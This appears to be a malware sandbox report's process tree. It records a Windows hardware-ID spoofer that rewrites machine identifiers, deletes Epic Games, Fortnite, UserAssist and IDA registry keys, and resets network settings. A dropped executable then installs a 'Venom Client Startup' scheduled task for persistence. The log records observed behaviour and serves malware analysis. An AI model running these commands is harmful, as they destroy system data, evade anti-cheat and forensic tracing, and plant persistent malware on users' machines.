C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f3⤵PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f3⤵PID:6016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f3⤵PID:4952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f3⤵PID:564
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple23059 /f4⤵
- Modifies registry key
PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f3⤵PID:3076
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 23059 /f4⤵PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f3⤵PID:4640
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f3⤵PID:2912
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple23062-27047-14694-31936} /f4⤵
- Modifies registry key
PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f3⤵PID:1088
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games /f4⤵PID:5916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f3⤵PID:3296
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic Games /f4⤵PID:5880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f3⤵PID:64
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f4⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f3⤵PID:1224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f3⤵PID:1720
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 23062-27047-14694-3193620763 /f4⤵
- Modifies registry key
PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f3⤵PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f3⤵PID:896
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f4⤵
- Modifies registry key
PID:5940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f3⤵PID:5936
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f4⤵
- Modifies registry key
PID:5648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f3⤵PID:472
-
C:\Windows\system32\reg.exereg delete HKCR\com.epicgames.launcher /f4⤵PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵PID:2468
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵PID:5836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵PID:3260
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵PID:5512
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵PID:676
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵PID:4004
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f3⤵PID:3640
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f4⤵PID:704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:5316
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f3⤵PID:936
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f4⤵
- Modifies registry key
PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:5872
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1380
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:2056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:780
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:5920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵PID:680
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵PID:5308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵PID:3576
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵
- Modifies registry key
PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵PID:2828
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵
- Modifies registry key
PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵PID:2192
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵PID:4192
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f3⤵PID:232
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f4⤵
- Modifies registry key
PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:220
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 230655028325592323231078962429702342331316296021782623189 /f4⤵
- Modifies registry class
- Modifies registry key
PID:5264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4056
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2104
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2848
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵PID:216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f3⤵PID:2876
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Classes\Interface /v ClsidStore /f4⤵
- Modifies registry key
PID:4588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1988
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
PID:4808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4932
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f3⤵PID:4960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f3⤵PID:4920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f3⤵PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵PID:4968
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
PID:3604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f3⤵PID:4848
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f4⤵PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f3⤵PID:4752
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History /f4⤵
- Modifies registry key
PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f3⤵PID:776
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History64 /f4⤵
- Modifies registry key
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵PID:3456
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f3⤵PID:5112
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f4⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f3⤵PID:4832
-
C:\Windows\system32\reg.exereg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f4⤵
- Modifies registry key
PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f3⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵PID:4280
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
PID:1048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f3⤵PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵PID:2916
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
PID:4216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f3⤵PID:5036
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f4⤵PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3596
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230691577617655145278624135504749615060234541767923233 /f4⤵
- Modifies registry key
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:5084
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2307226524275158221893917477315930337315721730617531 /f4⤵PID:4664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3728
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 23072265242751582218939174773159303373157217306 /f4⤵PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:1800
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3184
-
C:\Windows\system32\reg.exeREG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3240
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 230722652427515822189391747731593033731572 /f4⤵
- Modifies registry key
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:2200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f3⤵PID:3036
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 23072265242751 /f4⤵
- Modifies registry key
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:5388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3364
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f3⤵PID:4248
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.23072.26524-2751_582218939 /f4⤵PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f3⤵PID:6120
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {23072-26524-2751-5822} /f4⤵
- Modifies registry key
PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f3⤵PID:2500
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f4⤵
- Modifies registry key
PID:1564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f3⤵PID:3800
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f4⤵
- Modifies registry key
PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f3⤵PID:5996
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f4⤵
- Modifies registry key
PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:5980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:3860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh winsock reset3⤵PID:5956
-
C:\Windows\system32\netsh.exenetsh winsock reset4⤵PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh int ip reset3⤵PID:5708
-
C:\Windows\system32\netsh.exenetsh int ip reset4⤵PID:564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall reset3⤵PID:3076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns3⤵PID:2064
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns4⤵
- Gathers network information
PID:5624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /release3⤵PID:5884
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /renew3⤵PID:5284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -d3⤵PID:1808
-
C:\Windows\system32\ARP.EXEarp -d4⤵PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache3⤵PID:1224
-
C:\Windows\system32\netsh.exenetsh interface ip delete arpcache4⤵PID:4264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe3⤵PID:4336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:5940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe3⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4832
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5224
-
-
